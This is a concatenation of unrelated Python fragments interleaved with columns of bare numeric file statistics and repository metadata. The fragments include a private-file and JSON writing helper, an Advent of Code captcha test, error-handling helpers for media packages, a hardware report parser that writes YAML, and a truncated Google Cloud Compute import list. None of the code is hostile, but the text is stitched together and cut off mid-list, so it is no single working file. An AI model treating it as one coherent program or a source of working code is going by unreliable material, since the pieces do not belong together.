self.__f = openWriteJSON._BinaryWrapper(self.__open(self.__filePath, "wb"))
else:
if self.__format:
self.__f = self.__open(self.__filePath, "w", format=self.__format)
else:
self.__f = self.__open(self.__filePath, "w")
self.__f = openWriteJSON._JSONWrapper(self.__f, self.__bPretty)
return self.__f
#
def __exit__(self, *args):
self.__f.close()
if self.__bSafeWrite:
if os.path.isfile(self.__filePath):
os.unlink(self.__filePath)
os.rename(self.__filePathTmp, self.__filePath)
#
#
def writePrivateBinaryFile(binaryData, filePath:str):
assert isinstance(filePath, str)
assert isinstance(binaryData, (bytes, bytearray))
try:
os.remove(filePath)
except OSError:
pass
umask_original = os.umask(0)
try:
fdesc = os.open(filePath, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
finally:
os.umask(umask_original)
with os.fdopen(fdesc, "wb") as fout:
fout.write(binaryData)
#
def writePrivateJSONFile(jsonData, filePath:str, bPretty:bool = False):
assert isinstance(filePath, str)
assert isinstance(jsonData, (int, float, bool, str, list, tuple, dict))
if bPretty:
s = json.dumps(jsonData, indent="\t", sort_keys=True)
else:
s = json.dumps(jsonData)
writePrivateBinaryFile(s.encode("utf-8"), filePath)
#
def loadBinaryFile(filePath:str):
assert isinstance(filePath, str)
with open(filePath, "rb") as fin:
return fin.read()
#
| 21.986813
| 105
| 0.676529
| 1,254
| 10,004
| 4.936204
| 0.094099
| 0.051696
| 0.048465
| 0.048465
| 0.843296
| 0.837964
| 0.796284
| 0.779806
| 0.779806
| 0.763813
| 0
| 0.003565
| 0.186925
| 10,004
| 454
| 106
| 22.035242
| 0.757438
| 0.009096
| 0
| 0.80602
| 0
| 0
| 0.028743
| 0
| 0
| 0
| 0
| 0
| 0.020067
| 1
| 0.130435
| false
| 0.003344
| 0.016722
| 0
| 0.220736
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f0cf30a073f7b7cd3e5180d7586c746e027ea07c
| 2,695
|
py
|
Python
|
advent/day01/day01_test.py
|
benjackwhite/adventofcode2017
|
ce29e625cbe11fd5f36cff6b36a879c6a3955581
|
[
"MIT"
] | null | null | null |
advent/day01/day01_test.py
|
benjackwhite/adventofcode2017
|
ce29e625cbe11fd5f36cff6b36a879c6a3955581
|
[
"MIT"
] | null | null | null |
advent/day01/day01_test.py
|
benjackwhite/adventofcode2017
|
ce29e625cbe11fd5f36cff6b36a879c6a3955581
|
[
"MIT"
] | null | null | null |
from day01 import reverse_captcha, reverse_captcha_two
target = "237369991482346124663395286354672985457326865748533412179778188397835279584149971999798512279429268727171755461418974558538246429986747532417846157526523238931351898548279549456694488433438982744782258279173323381571985454236569393975735715331438256795579514159946537868358735936832487422938678194757687698143224139243151222475131337135843793611742383267186158665726927967655583875485515512626142935357421852953775733748941926983377725386196187486131337458574829848723711355929684625223564489485597564768317432893836629255273452776232319265422533449549956244791565573727762687439221862632722277129613329167189874939414298584616496839223239197277563641853746193232543222813298195169345186499866147586559781523834595683496151581546829112745533347796213673814995849156321674379644323159259131925444961296821167483628812395391533572555624159939279125341335147234653572977345582135728994395631685618135563662689854691976843435785879952751266627645653981281891643823717528757341136747881518611439246877373935758151119185587921332175189332436522732144278613486716525897262879287772969529445511736924962777262394961547579248731343245241963914775991292177151554446695134653596633433171866618541957233463548142173235821168156636824233487983766612338498874251672993917446366865832618475491341253973267556113323245113845148121546526396995991171739837147479978645166417988918289287844384513974369397974378819848552153961651881528134624869454563488858625261356763562723261767873542683796675797124322382732437235544965647934514871672522777378931524994784845817584793564974285139867972185887185987353468488155283698464226415951583138352839943621294117262483559867661596299753986347244786339543174594266422815794658477629829383461829261994591318851587963554829459353892825847978971823347219468516784857348649693185172199398234123745415271222891161175788713733444497592853221743138324235934216658323717267715318744537689459113188549896737581637879552568829548365738314593851221113932919767844137362623398623853789938824592"
def test_reverse_captcha_should_return_sum_of_consequent_numbers():
assert reverse_captcha("1122") == 3
assert reverse_captcha("1111") == 4
assert reverse_captcha("1234") == 0
assert reverse_captcha("91212129") == 9
assert reverse_captcha(target) == 995
def test_reverse_captcha_two_should_return_sum_of_circular_match():
assert reverse_captcha_two("1212") == 6
assert reverse_captcha_two("1221") == 0
assert reverse_captcha_two("123425") == 4
assert reverse_captcha_two("123123") == 12
assert reverse_captcha_two("12131415") == 4
assert reverse_captcha_two(target) == 1130
| 122.5
| 2,015
| 0.933952
| 92
| 2,695
| 26.956522
| 0.391304
| 0.084677
| 0.08871
| 0.055645
| 0.019355
| 0
| 0
| 0
| 0
| 0
| 0
| 0.799923
| 0.039332
| 2,695
| 21
| 2,016
| 128.333333
| 0.157976
| 0
| 0
| 0
| 0
| 0
| 0.76141
| 0.743599
| 0
| 1
| 0
| 0
| 0.733333
| 1
| 0.133333
| false
| 0
| 0.066667
| 0
| 0.2
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f0ef7b155bb4b950ff9c1906c9eb7678e8d0cc82
| 1,708
|
py
|
Python
|
lib/data_handling/errors.py
|
mpmuc84/helper-scripts
|
573353827d94f65efe763a93770ba75bcda90fff
|
[
"BSD-2-Clause"
] | 4
|
2018-10-11T09:48:39.000Z
|
2019-11-12T06:17:17.000Z
|
lib/data_handling/errors.py
|
mpmuc84/helper-scripts
|
573353827d94f65efe763a93770ba75bcda90fff
|
[
"BSD-2-Clause"
] | 26
|
2017-11-10T15:46:03.000Z
|
2021-08-13T12:02:27.000Z
|
lib/data_handling/errors.py
|
mpmuc84/helper-scripts
|
573353827d94f65efe763a93770ba75bcda90fff
|
[
"BSD-2-Clause"
] | 21
|
2017-10-12T11:47:37.000Z
|
2021-05-05T13:07:59.000Z
|
import logging
class SeriesError(Exception):
"""
Represents all errors that can hinder the recovery of a series.
Simply contains an error message and nothing else.
"""
pass
class MediaPackageError(Exception):
"""
Represents all errors that can hinder the recovery of a media package.
Simply contains an error message and nothing else.
"""
pass
def optional_series_error(error, ignore_errors, exception=None):
"""
Print a warning if errors should be ignored, otherwise raise a SeriesError
:param error: The message that should be printed as a warning or raised as an error
:type error: str
:param ignore_errors: Whether to raise an error or print a warning
:type ignore_errors: bool
:param exception: The exception that caused the error
:type exception: Exception
:raise SeriesError:
"""
if ignore_errors:
print("Warning: {}".format(error))
logging.error(error, exc_info=True)
else:
raise SeriesError(error) from exception
def optional_mp_error(error, ignore_errors, exception=None):
"""
Print a warning if errors should be ignored, otherwise raise a MediaPackageError
:param error: The message that should be printed as a warning or raised as an error
:type error: str
:param ignore_errors: Whether to raise an error or print a warning
:type ignore_errors: bool
:param exception: The exception that caused the error
:type exception: Exception
:raise MediaPackageError:
"""
if ignore_errors:
print("Warning: {}".format(error))
logging.error(error, exc_info=True)
else:
raise MediaPackageError(error) from exception
| 30.5
| 87
| 0.701991
| 225
| 1,708
| 5.266667
| 0.253333
| 0.081013
| 0.043882
| 0.047257
| 0.81519
| 0.81519
| 0.81519
| 0.81519
| 0.81519
| 0.737553
| 0
| 0
| 0.231265
| 1,708
| 55
| 88
| 31.054545
| 0.902513
| 0.579625
| 0
| 0.588235
| 0
| 0
| 0.037099
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0.117647
| 0.058824
| 0
| 0.294118
| 0.117647
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
0b1bb3284c89b249c3518aaa7325d895f6ee8edd
| 6,647
|
py
|
Python
|
report_parser/report_parser.py
|
joshwilding4444/testing
|
c687b61a2c423c4c7a60f9cdd9fc63e7499d7424
|
[
"BSD-3-Clause"
] | null | null | null |
report_parser/report_parser.py
|
joshwilding4444/testing
|
c687b61a2c423c4c7a60f9cdd9fc63e7499d7424
|
[
"BSD-3-Clause"
] | null | null | null |
report_parser/report_parser.py
|
joshwilding4444/testing
|
c687b61a2c423c4c7a60f9cdd9fc63e7499d7424
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python3
"""Parses a report into YAML."""
import sys
import yaml
import parse_dmidecode
import parse_operating_system
import parse_cpu
import parse_memory
import parse_storage
import parse_dm_multipath
import parse_lspci
import parse_ethtool
def test_dmidecode(input_filename):
"""Parses up to the DMIDECODE section."""
test_dmi = parse_dmidecode.read_dmidecode(open(input_filename))
yaml.dump(test_dmi, open('output.yaml', 'w'))
def test_read_operating_system(input_filename):
"""Parses up to the OS section."""
target_file = open(input_filename)
test_dmi = parse_dmidecode.read_dmidecode(target_file)
test_os = parse_operating_system.read_operating_system(target_file)
target_output = open('output.yaml', 'w')
yaml.dump(test_dmi, target_output)
yaml.dump(test_os, target_output)
def test_read_cpu_stats(input_filename):
"""Parses up to the CPU section."""
target_file = open(input_filename)
test_dmi = parse_dmidecode.read_dmidecode(target_file)
test_os = parse_operating_system.read_operating_system(target_file)
test_cpu_stats = parse_cpu.read_cpu_stats(target_file)
target_output = open('output.yaml', 'w')
yaml.dump(test_dmi, target_output)
yaml.dump(test_os, target_output)
yaml.dump(test_cpu_stats, target_output)
def test_read_memory_stats(input_filename):
"""Parses up to the MEMORY section."""
target_file = open(input_filename)
test_dmi = parse_dmidecode.read_dmidecode(target_file)
test_os = parse_operating_system.read_operating_system(target_file)
test_cpu_stats = parse_cpu.read_cpu_stats(target_file)
test_memory_stats = parse_memory.read_memory_stats(target_file)
target_output = open('output.yaml', 'w')
yaml.dump(test_dmi, target_output)
yaml.dump(test_os, target_output)
yaml.dump(test_cpu_stats, target_output)
yaml.dump(test_memory_stats, target_output)
def test_read_storage_stats(input_filename):
"""Parses up to the STORAGE section."""
target_file = open(input_filename)
test_dmi = parse_dmidecode.read_dmidecode(target_file)
test_os = parse_operating_system.read_operating_system(target_file)
test_cpu_stats = parse_cpu.read_cpu_stats(target_file)
test_memory_stats = parse_memory.read_memory_stats(target_file)
test_storage_stats = parse_storage.read_storage_stats(target_file)
target_output = open('output.yaml', 'w')
yaml.dump(test_dmi, target_output)
yaml.dump(test_os, target_output)
yaml.dump(test_cpu_stats, target_output)
yaml.dump(test_memory_stats, target_output)
yaml.dump(test_storage_stats, target_output)
def test_read_dm_multipath(input_filename):
"""Parses up to the DMI-MULTIPATH section."""
target_file = open(input_filename)
test_dmi = parse_dmidecode.read_dmidecode(target_file)
test_os = parse_operating_system.read_operating_system(target_file)
test_cpu_stats = parse_cpu.read_cpu_stats(target_file)
test_memory_stats = parse_memory.read_memory_stats(target_file)
test_storage_stats = parse_storage.read_storage_stats(target_file)
test_dm_multipath = parse_dm_multipath.parse_dm_multipath(target_file)
target_output = open('output.yaml', 'w')
yaml.dump(test_dmi, target_output)
yaml.dump(test_os, target_output)
yaml.dump(test_cpu_stats, target_output)
yaml.dump(test_memory_stats, target_output)
yaml.dump(test_storage_stats, target_output)
yaml.dump(test_dm_multipath, target_output)
def test_read_lspci(input_filename):
"""Parses up to the LSPCI section."""
target_file = open(input_filename)
test_dmi = parse_dmidecode.read_dmidecode(target_file)
test_os = parse_operating_system.read_operating_system(target_file)
test_cpu_stats = parse_cpu.read_cpu_stats(target_file)
test_memory_stats = parse_memory.read_memory_stats(target_file)
test_storage_stats = parse_storage.read_storage_stats(target_file)
test_dm_multipath = parse_dm_multipath.parse_dm_multipath(target_file)
test_lspci = parse_lspci.read_lspci(target_file)
target_output = open('output.yaml', 'w')
yaml.dump(test_dmi, target_output)
yaml.dump(test_os, target_output)
yaml.dump(test_cpu_stats, target_output)
yaml.dump(test_memory_stats, target_output)
yaml.dump(test_storage_stats, target_output)
yaml.dump(test_dm_multipath, target_output)
yaml.dump(test_lspci, target_output)
def test_read_ethtool(input_filename):
"""Parses up to the ETHTOOL section."""
target_file = open(input_filename)
test_dmi = parse_dmidecode.read_dmidecode(target_file)
test_os = parse_operating_system.read_operating_system(target_file)
test_cpu_stats = parse_cpu.read_cpu_stats(target_file)
test_memory_stats = parse_memory.read_memory_stats(target_file)
test_storage_stats = parse_storage.read_storage_stats(target_file)
test_dm_multipath = parse_dm_multipath.parse_dm_multipath(target_file)
test_lspci = parse_lspci.read_lspci(target_file)
test_ethtool = parse_ethtool.read_ethtool(target_file)
target_output = open('output.yaml', 'w')
yaml.dump(test_dmi, target_output)
yaml.dump(test_os, target_output)
yaml.dump(test_cpu_stats, target_output)
yaml.dump(test_memory_stats, target_output)
yaml.dump(test_storage_stats, target_output)
yaml.dump(test_dm_multipath, target_output)
yaml.dump(test_lspci, target_output)
yaml.dump(test_ethtool, target_output)
def read_entire_file(input_filename, output_filename):
"""Parses the entire report."""
target_file = open(input_filename)
test_dmi = parse_dmidecode.read_dmidecode(target_file)
test_os = parse_operating_system.read_operating_system(target_file)
test_cpu_stats = parse_cpu.read_cpu_stats(target_file)
test_memory_stats = parse_memory.read_memory_stats(target_file)
test_storage_stats = parse_storage.read_storage_stats(target_file)
test_dm_multipath = parse_dm_multipath.parse_dm_multipath(target_file)
test_lspci = parse_lspci.read_lspci(target_file)
test_ethtool = parse_ethtool.read_ethtool(target_file)
target_output = open(output_filename, 'w')
yaml.dump(test_dmi, target_output)
yaml.dump(test_os, target_output)
yaml.dump(test_cpu_stats, target_output)
yaml.dump(test_memory_stats, target_output)
yaml.dump(test_storage_stats, target_output)
yaml.dump(test_dm_multipath, target_output)
yaml.dump(test_lspci, target_output)
yaml.dump(test_ethtool, target_output)
def main():
"""Calls the function to read the entire report."""
read_entire_file(sys.argv[1], sys.argv[2])
if __name__ == "__main__":
main()
| 44.019868
| 74
| 0.781706
| 967
| 6,647
| 4.932782
| 0.049638
| 0.106918
| 0.110692
| 0.146751
| 0.885744
| 0.878826
| 0.837526
| 0.818029
| 0.818029
| 0.818029
| 0
| 0.000519
| 0.130284
| 6,647
| 150
| 75
| 44.313333
| 0.824598
| 0.05777
| 0
| 0.795276
| 0
| 0
| 0.016916
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.07874
| false
| 0
| 0.07874
| 0
| 0.15748
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6816dff8fb5c2e30c5ee4ed2e4af5d579dff6773
| 79,398
|
py
|
Python
|
google/cloud/compute_v1/types/__init__.py
|
georgiyekkert/python-compute
|
d128efbb3bf10af9b41e55b20aaa8080b3221e77
|
[
"Apache-2.0"
] | null | null | null |
google/cloud/compute_v1/types/__init__.py
|
georgiyekkert/python-compute
|
d128efbb3bf10af9b41e55b20aaa8080b3221e77
|
[
"Apache-2.0"
] | null | null | null |
google/cloud/compute_v1/types/__init__.py
|
georgiyekkert/python-compute
|
d128efbb3bf10af9b41e55b20aaa8080b3221e77
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .compute import (
AbandonInstancesInstanceGroupManagerRequest,
AbandonInstancesRegionInstanceGroupManagerRequest,
AcceleratorConfig,
Accelerators,
AcceleratorType,
AcceleratorTypeAggregatedList,
AcceleratorTypeList,
AcceleratorTypesScopedList,
AccessConfig,
AddAccessConfigInstanceRequest,
AddAssociationFirewallPolicyRequest,
AddHealthCheckTargetPoolRequest,
AddInstancesInstanceGroupRequest,
AddInstanceTargetPoolRequest,
AddNodesNodeGroupRequest,
AddPeeringNetworkRequest,
AddResourcePoliciesDiskRequest,
AddResourcePoliciesInstanceRequest,
AddResourcePoliciesRegionDiskRequest,
Address,
AddressAggregatedList,
AddressesScopedList,
AddressList,
AddRuleFirewallPolicyRequest,
AddRuleSecurityPolicyRequest,
AddSignedUrlKeyBackendBucketRequest,
AddSignedUrlKeyBackendServiceRequest,
AdvancedMachineFeatures,
AggregatedListAcceleratorTypesRequest,
AggregatedListAddressesRequest,
AggregatedListAutoscalersRequest,
AggregatedListBackendServicesRequest,
AggregatedListDisksRequest,
AggregatedListDiskTypesRequest,
AggregatedListForwardingRulesRequest,
AggregatedListGlobalOperationsRequest,
AggregatedListHealthChecksRequest,
AggregatedListInstanceGroupManagersRequest,
AggregatedListInstanceGroupsRequest,
AggregatedListInstancesRequest,
AggregatedListInterconnectAttachmentsRequest,
AggregatedListMachineTypesRequest,
AggregatedListNetworkEndpointGroupsRequest,
AggregatedListNodeGroupsRequest,
AggregatedListNodeTemplatesRequest,
AggregatedListNodeTypesRequest,
AggregatedListPacketMirroringsRequest,
AggregatedListPublicDelegatedPrefixesRequest,
AggregatedListRegionCommitmentsRequest,
AggregatedListReservationsRequest,
AggregatedListResourcePoliciesRequest,
AggregatedListRoutersRequest,
AggregatedListServiceAttachmentsRequest,
AggregatedListSslCertificatesRequest,
AggregatedListSubnetworksRequest,
AggregatedListTargetHttpProxiesRequest,
AggregatedListTargetHttpsProxiesRequest,
AggregatedListTargetInstancesRequest,
AggregatedListTargetPoolsRequest,
AggregatedListTargetVpnGatewaysRequest,
AggregatedListUrlMapsRequest,
AggregatedListVpnGatewaysRequest,
AggregatedListVpnTunnelsRequest,
AliasIpRange,
AllocationSpecificSKUAllocationAllocatedInstancePropertiesReservedDisk,
AllocationSpecificSKUAllocationReservedInstanceProperties,
AllocationSpecificSKUReservation,
Allowed,
ApplyUpdatesToInstancesInstanceGroupManagerRequest,
ApplyUpdatesToInstancesRegionInstanceGroupManagerRequest,
AttachDiskInstanceRequest,
AttachedDisk,
AttachedDiskInitializeParams,
AttachNetworkEndpointsGlobalNetworkEndpointGroupRequest,
AttachNetworkEndpointsNetworkEndpointGroupRequest,
AuditConfig,
AuditLogConfig,
AuthorizationLoggingOptions,
Autoscaler,
AutoscalerAggregatedList,
AutoscalerList,
AutoscalersScopedList,
AutoscalerStatusDetails,
AutoscalingPolicy,
AutoscalingPolicyCpuUtilization,
AutoscalingPolicyCustomMetricUtilization,
AutoscalingPolicyLoadBalancingUtilization,
AutoscalingPolicyScaleInControl,
AutoscalingPolicyScalingSchedule,
Backend,
BackendBucket,
BackendBucketCdnPolicy,
BackendBucketCdnPolicyBypassCacheOnRequestHeader,
BackendBucketCdnPolicyNegativeCachingPolicy,
BackendBucketList,
BackendService,
BackendServiceAggregatedList,
BackendServiceCdnPolicy,
BackendServiceCdnPolicyBypassCacheOnRequestHeader,
BackendServiceCdnPolicyNegativeCachingPolicy,
BackendServiceFailoverPolicy,
BackendServiceGroupHealth,
BackendServiceIAP,
BackendServiceList,
BackendServiceLogConfig,
BackendServiceReference,
BackendServicesScopedList,
Binding,
BulkInsertInstanceRequest,
BulkInsertInstanceResource,
BulkInsertInstanceResourcePerInstanceProperties,
BulkInsertRegionInstanceRequest,
CacheInvalidationRule,
CacheKeyPolicy,
CircuitBreakers,
CloneRulesFirewallPolicyRequest,
Commitment,
CommitmentAggregatedList,
CommitmentList,
CommitmentsScopedList,
Condition,
ConfidentialInstanceConfig,
ConnectionDraining,
ConsistentHashLoadBalancerSettings,
ConsistentHashLoadBalancerSettingsHttpCookie,
CorsPolicy,
CreateInstancesInstanceGroupManagerRequest,
CreateInstancesRegionInstanceGroupManagerRequest,
CreateSnapshotDiskRequest,
CreateSnapshotRegionDiskRequest,
CustomerEncryptionKey,
CustomerEncryptionKeyProtectedDisk,
Data,
DeleteAccessConfigInstanceRequest,
DeleteAddressRequest,
DeleteAutoscalerRequest,
DeleteBackendBucketRequest,
DeleteBackendServiceRequest,
DeleteDiskRequest,
DeleteExternalVpnGatewayRequest,
DeleteFirewallPolicyRequest,
DeleteFirewallRequest,
DeleteForwardingRuleRequest,
DeleteGlobalAddressRequest,
DeleteGlobalForwardingRuleRequest,
DeleteGlobalNetworkEndpointGroupRequest,
DeleteGlobalOperationRequest,
DeleteGlobalOperationResponse,
DeleteGlobalOrganizationOperationRequest,
DeleteGlobalOrganizationOperationResponse,
DeleteGlobalPublicDelegatedPrefixeRequest,
DeleteHealthCheckRequest,
DeleteImageRequest,
DeleteInstanceGroupManagerRequest,
DeleteInstanceGroupRequest,
DeleteInstanceRequest,
DeleteInstancesInstanceGroupManagerRequest,
DeleteInstancesRegionInstanceGroupManagerRequest,
DeleteInstanceTemplateRequest,
DeleteInterconnectAttachmentRequest,
DeleteInterconnectRequest,
DeleteLicenseRequest,
DeleteNetworkEndpointGroupRequest,
DeleteNetworkRequest,
DeleteNodeGroupRequest,
DeleteNodesNodeGroupRequest,
DeleteNodeTemplateRequest,
DeletePacketMirroringRequest,
DeletePerInstanceConfigsInstanceGroupManagerRequest,
DeletePerInstanceConfigsRegionInstanceGroupManagerRequest,
DeletePublicAdvertisedPrefixeRequest,
DeletePublicDelegatedPrefixeRequest,
DeleteRegionAutoscalerRequest,
DeleteRegionBackendServiceRequest,
DeleteRegionDiskRequest,
DeleteRegionHealthCheckRequest,
DeleteRegionHealthCheckServiceRequest,
DeleteRegionInstanceGroupManagerRequest,
DeleteRegionNetworkEndpointGroupRequest,
DeleteRegionNotificationEndpointRequest,
DeleteRegionOperationRequest,
DeleteRegionOperationResponse,
DeleteRegionSslCertificateRequest,
DeleteRegionTargetHttpProxyRequest,
DeleteRegionTargetHttpsProxyRequest,
DeleteRegionUrlMapRequest,
DeleteReservationRequest,
DeleteResourcePolicyRequest,
DeleteRouteRequest,
DeleteRouterRequest,
DeleteSecurityPolicyRequest,
DeleteServiceAttachmentRequest,
DeleteSignedUrlKeyBackendBucketRequest,
DeleteSignedUrlKeyBackendServiceRequest,
DeleteSnapshotRequest,
DeleteSslCertificateRequest,
DeleteSslPolicyRequest,
DeleteSubnetworkRequest,
DeleteTargetGrpcProxyRequest,
DeleteTargetHttpProxyRequest,
DeleteTargetHttpsProxyRequest,
DeleteTargetInstanceRequest,
DeleteTargetPoolRequest,
DeleteTargetSslProxyRequest,
DeleteTargetTcpProxyRequest,
DeleteTargetVpnGatewayRequest,
DeleteUrlMapRequest,
DeleteVpnGatewayRequest,
DeleteVpnTunnelRequest,
DeleteZoneOperationRequest,
DeleteZoneOperationResponse,
Denied,
DeprecateImageRequest,
DeprecationStatus,
DetachDiskInstanceRequest,
DetachNetworkEndpointsGlobalNetworkEndpointGroupRequest,
DetachNetworkEndpointsNetworkEndpointGroupRequest,
DisableXpnHostProjectRequest,
DisableXpnResourceProjectRequest,
Disk,
DiskAggregatedList,
DiskInstantiationConfig,
DiskList,
DiskMoveRequest,
DisksAddResourcePoliciesRequest,
DisksRemoveResourcePoliciesRequest,
DisksResizeRequest,
DisksScopedList,
DiskType,
DiskTypeAggregatedList,
DiskTypeList,
DiskTypesScopedList,
DisplayDevice,
DistributionPolicy,
DistributionPolicyZoneConfiguration,
Duration,
EnableXpnHostProjectRequest,
EnableXpnResourceProjectRequest,
Error,
Errors,
ExchangedPeeringRoute,
ExchangedPeeringRoutesList,
ExpandIpCidrRangeSubnetworkRequest,
Expr,
ExternalVpnGateway,
ExternalVpnGatewayInterface,
ExternalVpnGatewayList,
FileContentBuffer,
Firewall,
FirewallList,
FirewallLogConfig,
FirewallPoliciesListAssociationsResponse,
FirewallPolicy,
FirewallPolicyAssociation,
FirewallPolicyList,
FirewallPolicyRule,
FirewallPolicyRuleMatcher,
FirewallPolicyRuleMatcherLayer4Config,
FixedOrPercent,
ForwardingRule,
ForwardingRuleAggregatedList,
ForwardingRuleList,
ForwardingRuleReference,
ForwardingRuleServiceDirectoryRegistration,
ForwardingRulesScopedList,
GetAcceleratorTypeRequest,
GetAddressRequest,
GetAssociationFirewallPolicyRequest,
GetAutoscalerRequest,
GetBackendBucketRequest,
GetBackendServiceRequest,
GetDiagnosticsInterconnectRequest,
GetDiskRequest,
GetDiskTypeRequest,
GetEffectiveFirewallsInstanceRequest,
GetEffectiveFirewallsNetworkRequest,
GetExternalVpnGatewayRequest,
GetFirewallPolicyRequest,
GetFirewallRequest,
GetForwardingRuleRequest,
GetFromFamilyImageRequest,
GetGlobalAddressRequest,
GetGlobalForwardingRuleRequest,
GetGlobalNetworkEndpointGroupRequest,
GetGlobalOperationRequest,
GetGlobalOrganizationOperationRequest,
GetGlobalPublicDelegatedPrefixeRequest,
GetGuestAttributesInstanceRequest,
GetHealthBackendServiceRequest,
GetHealthCheckRequest,
GetHealthRegionBackendServiceRequest,
GetHealthTargetPoolRequest,
GetIamPolicyDiskRequest,
GetIamPolicyFirewallPolicyRequest,
GetIamPolicyImageRequest,
GetIamPolicyInstanceRequest,
GetIamPolicyInstanceTemplateRequest,
GetIamPolicyLicenseRequest,
GetIamPolicyNodeGroupRequest,
GetIamPolicyNodeTemplateRequest,
GetIamPolicyRegionDiskRequest,
GetIamPolicyReservationRequest,
GetIamPolicyResourcePolicyRequest,
GetIamPolicyServiceAttachmentRequest,
GetIamPolicySnapshotRequest,
GetIamPolicySubnetworkRequest,
GetImageFamilyViewRequest,
GetImageRequest,
GetInstanceGroupManagerRequest,
GetInstanceGroupRequest,
GetInstanceRequest,
GetInstanceTemplateRequest,
GetInterconnectAttachmentRequest,
GetInterconnectLocationRequest,
GetInterconnectRequest,
GetLicenseCodeRequest,
GetLicenseRequest,
GetMachineTypeRequest,
GetNatMappingInfoRoutersRequest,
GetNetworkEndpointGroupRequest,
GetNetworkRequest,
GetNodeGroupRequest,
GetNodeTemplateRequest,
GetNodeTypeRequest,
GetPacketMirroringRequest,
GetProjectRequest,
GetPublicAdvertisedPrefixeRequest,
GetPublicDelegatedPrefixeRequest,
GetRegionAutoscalerRequest,
GetRegionBackendServiceRequest,
GetRegionCommitmentRequest,
GetRegionDiskRequest,
GetRegionDiskTypeRequest,
GetRegionHealthCheckRequest,
GetRegionHealthCheckServiceRequest,
GetRegionInstanceGroupManagerRequest,
GetRegionInstanceGroupRequest,
GetRegionNetworkEndpointGroupRequest,
GetRegionNotificationEndpointRequest,
GetRegionOperationRequest,
GetRegionRequest,
GetRegionSslCertificateRequest,
GetRegionTargetHttpProxyRequest,
GetRegionTargetHttpsProxyRequest,
GetRegionUrlMapRequest,
GetReservationRequest,
GetResourcePolicyRequest,
GetRouteRequest,
GetRouterRequest,
GetRouterStatusRouterRequest,
GetRuleFirewallPolicyRequest,
GetRuleSecurityPolicyRequest,
GetScreenshotInstanceRequest,
GetSecurityPolicyRequest,
GetSerialPortOutputInstanceRequest,
GetServiceAttachmentRequest,
GetShieldedInstanceIdentityInstanceRequest,
GetSnapshotRequest,
GetSslCertificateRequest,
GetSslPolicyRequest,
GetStatusVpnGatewayRequest,
GetSubnetworkRequest,
GetTargetGrpcProxyRequest,
GetTargetHttpProxyRequest,
GetTargetHttpsProxyRequest,
GetTargetInstanceRequest,
GetTargetPoolRequest,
GetTargetSslProxyRequest,
GetTargetTcpProxyRequest,
GetTargetVpnGatewayRequest,
GetUrlMapRequest,
GetVpnGatewayRequest,
GetVpnTunnelRequest,
GetXpnHostProjectRequest,
GetXpnResourcesProjectsRequest,
GetZoneOperationRequest,
GetZoneRequest,
GlobalNetworkEndpointGroupsAttachEndpointsRequest,
GlobalNetworkEndpointGroupsDetachEndpointsRequest,
GlobalOrganizationSetPolicyRequest,
GlobalSetLabelsRequest,
GlobalSetPolicyRequest,
GRPCHealthCheck,
GuestAttributes,
GuestAttributesEntry,
GuestAttributesValue,
GuestOsFeature,
HealthCheck,
HealthCheckList,
HealthCheckLogConfig,
HealthCheckReference,
HealthChecksAggregatedList,
HealthCheckService,
HealthCheckServiceReference,
HealthCheckServicesList,
HealthChecksScopedList,
HealthStatus,
HealthStatusForNetworkEndpoint,
HostRule,
HTTP2HealthCheck,
HttpFaultAbort,
HttpFaultDelay,
HttpFaultInjection,
HttpHeaderAction,
HttpHeaderMatch,
HttpHeaderOption,
HTTPHealthCheck,
HttpQueryParameterMatch,
HttpRedirectAction,
HttpRetryPolicy,
HttpRouteAction,
HttpRouteRule,
HttpRouteRuleMatch,
HTTPSHealthCheck,
Image,
ImageFamilyView,
ImageList,
InitialStateConfig,
InsertAddressRequest,
InsertAutoscalerRequest,
InsertBackendBucketRequest,
InsertBackendServiceRequest,
InsertDiskRequest,
InsertExternalVpnGatewayRequest,
InsertFirewallPolicyRequest,
InsertFirewallRequest,
InsertForwardingRuleRequest,
InsertGlobalAddressRequest,
InsertGlobalForwardingRuleRequest,
InsertGlobalNetworkEndpointGroupRequest,
InsertGlobalPublicDelegatedPrefixeRequest,
InsertHealthCheckRequest,
InsertImageRequest,
InsertInstanceGroupManagerRequest,
InsertInstanceGroupRequest,
InsertInstanceRequest,
InsertInstanceTemplateRequest,
InsertInterconnectAttachmentRequest,
InsertInterconnectRequest,
InsertLicenseRequest,
InsertNetworkEndpointGroupRequest,
InsertNetworkRequest,
InsertNodeGroupRequest,
InsertNodeTemplateRequest,
